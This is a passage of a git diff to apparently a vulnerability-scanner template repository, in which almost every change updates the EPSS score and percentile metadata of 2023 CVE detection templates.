epss-percentile: 0.88713 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 23cf051764..70215556e1 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.1975 - epss-percentile: 0.95744 + epss-score: 0.209 + epss-percentile: 0.95846 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 659efab816..0b26749b81 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-37629 cwe-id: CWE-434 epss-score: 0.13691 - epss-percentile: 0.95005 + epss-percentile: 0.9501 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index df5fdcf539..8395a99472 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 - epss-score: 0.00525 - epss-percentile: 0.74346 + epss-score: 0.00634 + epss-percentile: 0.76801 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 9a58e715eb..6907a586ef 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-37679 cwe-id: CWE-77 epss-score: 0.08527 - epss-percentile: 0.93748 + epss-percentile: 0.93753 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 8a8215a720..dd84b3d197 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-37979 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40639 + epss-percentile: 0.40663 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 67a3829aab..2ac3d8aa91 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-38205 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.83516 - epss-percentile: 0.98095 + epss-percentile: 0.98097 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index c39146ada1..5a6f586694 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3836 cwe-id: CWE-434 epss-score: 0.03083 - epss-percentile: 0.89929 + epss-percentile: 0.89933 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index ed214b0727..c5c6953bc8 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index eb46b1c170..45364c800a 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-38433 cwe-id: CWE-798 epss-score: 0.00438 - epss-percentile: 0.71909 + epss-percentile: 0.71933 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index b39f070143..019299229d 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3844 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index 26f251d69f..f357d81130 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index ff839327de..31be4ee4fd 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3846 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 016f35aa6d..e691705daf 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 2e8f1b40d6..79d29d7adb 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3848 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index ac1c4e9871..926f8296a7 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3849 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 066263eac2..967b31a690 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-38501 cwe-id: CWE-79 epss-score: 0.00282 - epss-percentile: 0.65019 + epss-percentile: 0.65054 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index ced88c02c9..8a909bc5c4 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38646 epss-score: 0.60885 - epss-percentile: 0.97428 + epss-percentile: 0.97429 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 586a972286..2d70f0f792 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-39026 cwe-id: CWE-22 epss-score: 0.06593 - epss-percentile: 0.93006 + epss-percentile: 0.93011 cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index fcf0e42862..6505fa8d50 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39108 cwe-id: CWE-918 epss-score: 0.01639 - epss-percentile: 0.86143 + epss-percentile: 0.86148 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index fbf56ca5e6..c958b36375 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39109 cwe-id: CWE-918 epss-score: 0.01639 - epss-percentile: 0.86143 + epss-percentile: 0.86148 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 019336ed96..9a6df98345 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39110 cwe-id: CWE-918 epss-score: 0.01639 - epss-percentile: 0.86143 + epss-percentile: 0.86148 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 996a2c7563..2cbe246f26 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39141 cwe-id: CWE-22 epss-score: 0.00362 - epss-percentile: 0.6924 + epss-percentile: 0.69266 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index b77e9686d7..9bef415531 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39143 cwe-id: CWE-22 epss-score: 0.89139 - epss-percentile: 0.98394 + epss-percentile: 0.98395 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 45cd306197..665c4d0520 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3936 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26647 + epss-percentile: 0.26649 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 70c60059ff..b3a3d78804 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-39361 cwe-id: CWE-89 epss-score: 0.04156 - epss-percentile: 0.91199 + epss-percentile: 0.91203 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index c0f48f03a5..0059c7d297 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39598 cwe-id: CWE-79 epss-score: 0.0062 - epss-percentile: 0.76541 + epss-percentile: 0.76563 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index d898fea7f5..e244fa3419 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26569 + epss-percentile: 0.26573 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 659464efd8..15216bc90c 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55428 + epss-percentile: 0.5545 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index dcf8b48e9b..c9d922af43 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39677 epss-score: 0.00632 - epss-percentile: 0.76747 + epss-percentile: 0.76767 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 45548304ee..db392b6b02 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.00215 - epss-percentile: 0.59393 + epss-percentile: 0.59426 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index ca14437f6c..853b62306f 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40208 cwe-id: CWE-79 epss-score: 0.00096 - epss-percentile: 0.40009 + epss-percentile: 0.40026 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index f693bc9849..2f38e34d7e 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-40779 cwe-id: CWE-601 epss-score: 0.00789 - epss-percentile: 0.79603 + epss-percentile: 0.79611 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index bde0cb1382..e5835be329 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4110 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 3e066bb7c9..428ca19a51 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4111 cwe-id: CWE-79 epss-score: 0.00207 - epss-percentile: 0.58479 + epss-percentile: 0.58506 cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index c0919fe305..d1efffb070 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4112 cwe-id: CWE-79 epss-score: 0.00249 - epss-percentile: 0.62601 + epss-percentile: 0.62629 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 33f0ef4639..b738b91998 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4113 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.66168 + epss-percentile: 0.66203 cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 9fd110650c..bac1442c5d 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4114 cwe-id: CWE-79 epss-score: 0.00447 - epss-percentile: 0.72204 + epss-percentile: 0.72228 cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index cf35b617a0..d3abcb6de3 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.66168 + epss-percentile: 0.66203 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 11064d7f78..8e8152dcdd 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4116 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.66168 + epss-percentile: 0.66203 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 0406cef1ea..64e448a0eb 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-4148 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29758 + epss-percentile: 0.29762 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index a9ddb6d498..0371d1c726 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-41538 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43581 + epss-percentile: 0.43604 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 362d3c29e0..23885e6e9c 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-41642 cwe-id: CWE-79 - epss-score: 0.00068 - epss-percentile: 0.28646 + epss-score: 0.00062 + epss-percentile: 0.25002 cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index a2fba14ab0..30ddc9d718 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.29305 - epss-percentile: 0.96366 + epss-percentile: 0.96368 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 5478d2da6c..0f1b9ccfcd 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4169 - epss-score: 0.00063 - epss-percentile: 0.26144 + epss-score: 0.01851 + epss-percentile: 0.87012 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index ef0f04f6f9..a9a3296c9b 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-4173 cwe-id: CWE-79 epss-score: 0.00176 - epss-percentile: 0.5459 + epss-percentile: 0.54614 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 6b08634dc9..4785f2a89f 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-4174 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58725 + epss-percentile: 0.58755 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 8a9c023e94..12a40f7559 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-41892 cwe-id: CWE-94 epss-score: 0.20628 - epss-percentile: 0.95815 + epss-percentile: 0.95817 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index e398332505..57aa8042ad 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-42442 cwe-id: CWE-287 epss-score: 0.09005 - epss-percentile: 0.9393 + epss-percentile: 0.93935 cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 643a2060ba..e2dc0b7197 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-43261 cwe-id: CWE-532 epss-score: 0.00476 - epss-percentile: 0.7306 + epss-percentile: 0.73089 cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 12b05c555d..7ca4e1426b 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 - epss-score: 0.00043 - epss-percentile: 0.07283 + epss-score: 0.00091 + epss-percentile: 0.38586 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -79,4 +79,5 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 490a0046304402206fa98b8876eafe1d6857bf0fd90c40bd6896f7b806ec8e1a1a7b144a656ce039022073ce57901e4044f95738ac9f46e8e1b89d56b4020fe53cc45a4e3ce79f691b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206fa98b8876eafe1d6857bf0fd90c40bd6896f7b806ec8e1a1a7b144a656ce039022073ce57901e4044f95738ac9f46e8e1b89d56b4020fe53cc45a4e3ce79f691b50:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index a80b3c6144..a01b7811a6 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 - epss-percentile: 0.6892 + epss-percentile: 0.68945 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 79675558c3..32590396e3 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4451 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26569 + epss-percentile: 0.26573 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 635bccad68..4466dd3e82 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4547 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58245 + epss-percentile: 0.58274 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 1b5cfa97a7..8e14fa115b 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-4568 cwe-id: CWE-287 epss-score: 0.00261 - epss-percentile: 0.63642 + epss-percentile: 0.63676 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index dc7cb53825..22e3a15550 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-45852 cwe-id: CWE-77 epss-score: 0.1097 - epss-percentile: 0.94498 + epss-percentile: 0.94501 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 77a7ea7640..586785e57c 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-4634 cwe-id: CWE-73 epss-score: 0.01945 - epss-percentile: 0.87379 + epss-percentile: 0.87385 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 